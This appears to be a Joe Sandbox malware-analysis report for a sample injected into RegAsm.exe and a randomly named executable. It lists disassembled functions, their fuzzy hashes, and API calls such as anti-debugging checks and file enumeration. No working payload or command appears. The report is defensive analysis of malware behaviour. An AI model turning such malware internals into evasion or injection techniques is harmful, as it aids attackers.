Function 00434E40 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 3c139d6eab4f7620a22a0d606d87fcbc4dc743c33131461d2f0d30ac98b6a4b2
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: A2114C33A051D44EC312CD3C84005E6BFA31AD7635F5D539AF4B49B2D2D62B9D8B8359

Uniqueness

Uniqueness Score: -1.00%

Function 004257B0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc5cb0613f38e808eb5e8b655ee922c45256005e2b66a0e9ea81f4781ece7861
Instruction ID: ec3d528f2270ac3b63c914715e3db12aeab2af93153c2d301f0f23efb63afd8f
Opcode Fuzzy Hash: dc5cb0613f38e808eb5e8b655ee922c45256005e2b66a0e9ea81f4781ece7861
Instruction Fuzzy Hash: 8301B1F6700F1187D720BE55A4C073BB2A86F90708F88843EE84597342DBB9EC14C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 0043DC3C Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c44ee645344884fa4bef575c7552f5c67be760e630824e1fe88c1ccf711ca11
Instruction ID: 1a313c9cf31c853288e4734d925e51de81e2693d37209096e1195a698a917d73
Opcode Fuzzy Hash: 0c44ee645344884fa4bef575c7552f5c67be760e630824e1fe88c1ccf711ca11
Instruction Fuzzy Hash: A001E53091824C4AC72CEB34E8E177677515B0B300F04606AD1518B3D2E269CA19D648

Uniqueness

Uniqueness Score: -1.00%

Function 0043CE90 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fd0a49f3a676b8e62110508ed4fe986eae05f51152ac04a08ad3d7889a19a84
Instruction ID: 115f720f8bb0168ef77c3f91c01ea07f6d3a9087be5756b6021b734009b12dbc
Opcode Fuzzy Hash: 0fd0a49f3a676b8e62110508ed4fe986eae05f51152ac04a08ad3d7889a19a84
Instruction Fuzzy Hash: A71155705183809FE314CF19C8A471FFBF5EB86755F148A1DE89087791D379D8048B86

Uniqueness

Uniqueness Score: -1.00%

Function 004032C0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8da9d82a427e1a4e61bf191ef954a9694fb434ef2c3119712575cda2d10e316
Instruction ID: 633822158d210b95260cba4b65dfce6bb097a418dc3364511bbd2d2b708878cc
Opcode Fuzzy Hash: f8da9d82a427e1a4e61bf191ef954a9694fb434ef2c3119712575cda2d10e316
Instruction Fuzzy Hash: 44F0E97F7993160BE310CDAA9CC0837B7DAD7C9245B09903AEE81E3241D975ED028298

Uniqueness

Uniqueness Score: -1.00%

Function 0043B383 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bfeccbc6efb29e523489534d420342eae27b48a9d5cd8e493df85188aa5f8d5
Instruction ID: 5063ba2a7f9e9a17a2f2dfea6a416b50fe31c133ddc90e2d19472c3a8f180a71
Opcode Fuzzy Hash: 3bfeccbc6efb29e523489534d420342eae27b48a9d5cd8e493df85188aa5f8d5
Instruction Fuzzy Hash: D90125715083509FD718CF14D4A476FFBB1EBC5325F208A2EE8A917681C739D9098B8A

Uniqueness

Uniqueness Score: -1.00%

Function 00413DC9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4559f36946e0837a5783f0aa1c3918e93b96a52084024a3395fb4f6c42aed4ae
Instruction ID: cb411177c030cf97ba39f8021a48c7e21d2bb03123e4cb1a8c5fa1e2b3d8abec
Opcode Fuzzy Hash: 4559f36946e0837a5783f0aa1c3918e93b96a52084024a3395fb4f6c42aed4ae
Instruction Fuzzy Hash: E6E08CE9E8010027C508AB616D0BA1B71694697309F085839AE0AF33C3E57DD219817E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF10 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
Instruction ID: 348063cde97b74a904e8a025caf8f2cc7e983a95a843570f11f6bb0cc0125070
Opcode Fuzzy Hash: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
Instruction Fuzzy Hash: 48E0C277B156620BA718CE354CA01BBB7E65A87222B1CA57EE492E3248C13CC8014299

Uniqueness

Uniqueness Score: -1.00%

Function 00417213 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad4a982f00307cafdcb48af3f99fdbfa993d9f194633aa7adfe2ddc01de40f1b
Instruction ID: c5b0c3171b5c0fc30e9624f3b985409e05439aa914e559d324b52c27a76cfb45
Opcode Fuzzy Hash: ad4a982f00307cafdcb48af3f99fdbfa993d9f194633aa7adfe2ddc01de40f1b
Instruction Fuzzy Hash: 89C08CBA9808004BC6449B10AC92836A230A303108B40643D8487F3A53C920E411891E

Uniqueness

Uniqueness Score: -1.00%

Function 00413F77 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e645e41aebba80813b2da8b514da75e6cc4fa9a1096b1d29d637d5313dfe2149
Instruction ID: 990ccd68f240f5387efa856334061f8e6857e40e2222bb5a6eeb7f1dd9b5c2b7
Opcode Fuzzy Hash: e645e41aebba80813b2da8b514da75e6cc4fa9a1096b1d29d637d5313dfe2149
Instruction Fuzzy Hash: E1C04C787941008B46488F909891535A2A5939B105B1470398502E7750C668D803891D

Uniqueness

Uniqueness Score: -1.00%

Function 004318FC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00431985
GetSystemMetrics.USER32 ref: 00431996
DeleteObject.GDI32 ref: 004319F5
SelectObject.GDI32 ref: 00431A46
SelectObject.GDI32 ref: 00431AE6
DeleteObject.GDI32 ref: 00431B20

Strings

, xrefs: 00431AB9

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID:
API String ID: 3911056724-3916222277
Opcode ID: 061582519a82205fd57b9c80c268b22cebff58d583f334f6816e0960824eb286
Instruction ID: 8b6cd038546e8a3ee5dd580ea527fa424ed6a826af38d2db9f48fbc413033eda
Opcode Fuzzy Hash: 061582519a82205fd57b9c80c268b22cebff58d583f334f6816e0960824eb286
Instruction Fuzzy Hash: 6F918CB8605B00DFD754EF29D995A16BBF4FF4A310F50892DE89ACB360D731A844CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0041E55F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 276COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0041E66A
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041E693
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0041E85A
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041E888

Strings

$A, xrefs: 0041E92B

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: $A
API String ID: 237503144-3805099881
Opcode ID: 99fb2d5d8a94b47272a11d39d9b109e2ad53e845ac1d9f6a7b6c817574722962
Instruction ID: 79d83383be667e3613a2e7d57e0417d705495b545e8fdd8e4721bb29f65553b0
Opcode Fuzzy Hash: 99fb2d5d8a94b47272a11d39d9b109e2ad53e845ac1d9f6a7b6c817574722962
Instruction Fuzzy Hash: 7FC17AB52007018FD764CF16C895B567BB1EF46320F168A9CD8AA8FBA6D734E441CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00411828 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 364COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 004133D2
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 00413403

Strings

8, xrefs: 00411BD9

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 8
API String ID: 237503144-4194326291
Opcode ID: ba29664044c5481240e674ccf1ac3bdddf64f5993beb54e1994f6eacc09f3b7e
Instruction ID: 5bf69640b30085b034ea74aa1be193b3bf49d060584b7f5e18c94cd97ae8cbc6
Opcode Fuzzy Hash: ba29664044c5481240e674ccf1ac3bdddf64f5993beb54e1994f6eacc09f3b7e
Instruction Fuzzy Hash: 68E1477054C782CBE335CF24C854BEFB7E1BF85305F48592DE49987282E77998068B96

Uniqueness

Uniqueness Score: -1.00%

Function 004234B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 00423653

Strings

01, xrefs: 00423593

Memory Dump Source

Source File: 00000011.00000002.2646306465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 01
API String ID: 237503144-3477152822
Opcode ID: d639aa79430a15bdaf70feaaa8ac31ca75d56682c02667b36b64c4539fbb9988
Instruction ID: a45431f77b860361b6724182c51371b065d5fd1df72a9721dc77f6e25f76f171
Opcode Fuzzy Hash: d639aa79430a15bdaf70feaaa8ac31ca75d56682c02667b36b64c4539fbb9988
Instruction Fuzzy Hash: 3551CDB16083919BD720CF19D881B5FBBF5FBC5348F44892DE5998B281DB389902CB96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: v6ggwc2fJXXgIu5fzDQ2.exePID: 5076, Parent PID: 1804COMMON

Non-executed Functions

Function 003B130E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,003B162C,00000002,00000000,?,?,?,003B162C,?,00000000), ref: 003B13A7
GetLocaleInfoW.KERNEL32(?,20001004,003B162C,00000002,00000000,?,?,?,003B162C,?,00000000), ref: 003B13D0
GetACP.KERNEL32(?,?,003B162C,?,00000000), ref: 003B13E5

Strings

ACP, xrefs: 003B132C
OCP, xrefs: 003B1362

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: a20086a348626dafebd941b67cba9f93f8f2f5f2cb874b06e83802584496a6ff
Instruction ID: db60f209672d7972cbe9da0a1822e1c7d941ebbcdb91b24ed14bde98c4d24efd
Opcode Fuzzy Hash: a20086a348626dafebd941b67cba9f93f8f2f5f2cb874b06e83802584496a6ff
Instruction Fuzzy Hash: C421B53A60410496D7338F65C960AD772EAEB50B5CB978524EB0EC7D04F732DD40C350

Uniqueness

Uniqueness Score: -1.00%

Function 003B14E3 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 003A8EFA: GetLastError.KERNEL32(?,?,003A48B4,?,8 :,0000000F,?,00000003,003A059B,003A1FAA,?,?,?,?,?,00000000), ref: 003A8EFE
Part of subcall function 003A8EFA: SetLastError.KERNEL32(00000000,?,00000003,003A059B,003A1FAA,?,?,?,?,?,00000000,003A2038,00000000,00000000,00000000,00000000), ref: 003A8FA0

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 003B15EF
IsValidCodePage.KERNEL32(00000000), ref: 003B1638
IsValidLocale.KERNEL32(?,00000001), ref: 003B1647
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 003B168F
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 003B16AE

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 3895ef84929f2bb2a55ede9d2389329ec50a61f7e1236a51e0d855518c34e92f
Instruction ID: 557a307f1069a4f6e1af5eedcd338e58d8773a1c89e1b1a700fc6839b417f9f3
Opcode Fuzzy Hash: 3895ef84929f2bb2a55ede9d2389329ec50a61f7e1236a51e0d855518c34e92f
Instruction Fuzzy Hash: 50518072A002099FDB22DFA5CC55BFE73B8EF45309F454466EA01EB590EBB0DA008B61

Uniqueness

Uniqueness Score: -1.00%

Function 003A4900 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 449COMMON

Download Yara Rule

Strings

A1;, xrefs: 003A491B, 003A4A9E, 003A4CC7, 003A4C60, 003A4AED
A1;, xrefs: 003A4C43, 003A4C21

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID:
String ID: A1;$A1;
API String ID: 0-1335479588
Opcode ID: 37f7206ac82e6e1356151d2a48892f1cf41209805034d1f68419ed34293b673d
Instruction ID: 4a2dba2e613dec64b554522c5433115b047ea2dbc6b6271c0163bc96f1887d7d
Opcode Fuzzy Hash: 37f7206ac82e6e1356151d2a48892f1cf41209805034d1f68419ed34293b673d
Instruction Fuzzy Hash: 13F17271E012199FDF15CFA8D9806AEF7B1FF89324F158269E819AB381D770AD01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003A1E2D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 003A1F25
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 003A1F2F
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 003A1F3C

Strings

8 :, xrefs: 003A1ED7

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: 8 :
API String ID: 3906539128-2259783722
Opcode ID: ad8787cdf4a56882147e89674da6e7c56128027921773608a73504d83f4ece5b
Instruction ID: 086f47092bdc4a223491809f4391dcd6d718fadd1bb61915c78962d079d0e713
Opcode Fuzzy Hash: ad8787cdf4a56882147e89674da6e7c56128027921773608a73504d83f4ece5b
Instruction Fuzzy Hash: C231C4749112289BCF22DF24DC89B9DBBB8FF48310F5042EAE40CA6290E7749F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 00400D50 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd13e52dc3baf3ca0046bbd133d940de6b673a3fb8009cc91da3ec5da1511bb5
Instruction ID: 2983d12239f8057d9c7700fde9fe7700b626def7aa5fb98b33d40ee48664cbc7
Opcode Fuzzy Hash: cd13e52dc3baf3ca0046bbd133d940de6b673a3fb8009cc91da3ec5da1511bb5
Instruction Fuzzy Hash: 98025C71E012199BDF14CFA9C980AAEF7F1FF48314F24826AE519FB390D735A9418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00400D50 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd13e52dc3baf3ca0046bbd133d940de6b673a3fb8009cc91da3ec5da1511bb5
Instruction ID: 2983d12239f8057d9c7700fde9fe7700b626def7aa5fb98b33d40ee48664cbc7
Opcode Fuzzy Hash: cd13e52dc3baf3ca0046bbd133d940de6b673a3fb8009cc91da3ec5da1511bb5
Instruction Fuzzy Hash: 98025C71E012199BDF14CFA9C980AAEF7F1FF48314F24826AE519FB390D735A9418B94

Uniqueness

Uniqueness Score: -1.00%

Function 003A7D08 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 003A7D95

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 94ca38b4c9fa21947792df0c2af9e2f487aded66817c04c9dfecda15d806a1a0
Instruction ID: d6ddd614b61f08da5d20c52f3adb73f92192d4ca811eb8dc706baa2c8f8ddd29
Opcode Fuzzy Hash: 94ca38b4c9fa21947792df0c2af9e2f487aded66817c04c9dfecda15d806a1a0
Instruction Fuzzy Hash: 84B15B329092459FDB27CF68CCC1BFEBBA5EF5A340F1541A9E915AF241D6349E01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 003AE66D Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 003AE708
FindNextFileW.KERNEL32(00000000,?), ref: 003AE783
FindClose.KERNEL32(00000000), ref: 003AE7A5
FindClose.KERNEL32(00000000), ref: 003AE7C8

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: d5acaeb9da6a8ae459345b8d9f96cf08b1149b947d5f39c650830fb4fdc09adc
Instruction ID: a51af9df23792bce0d3b2e3b497b4780a8ab5018641ee8da0939ed06b863da4f
Opcode Fuzzy Hash: d5acaeb9da6a8ae459345b8d9f96cf08b1149b947d5f39c650830fb4fdc09adc
Instruction Fuzzy Hash: 3A41B671900629AFDF22DF68CCC9DBAB7BDEB96305F154595E405E7180E6319E80CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0039B915 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0039B921
IsDebuggerPresent.KERNEL32 ref: 0039B9ED
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0039BA06
UnhandledExceptionFilter.KERNEL32(?), ref: 0039BA10

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
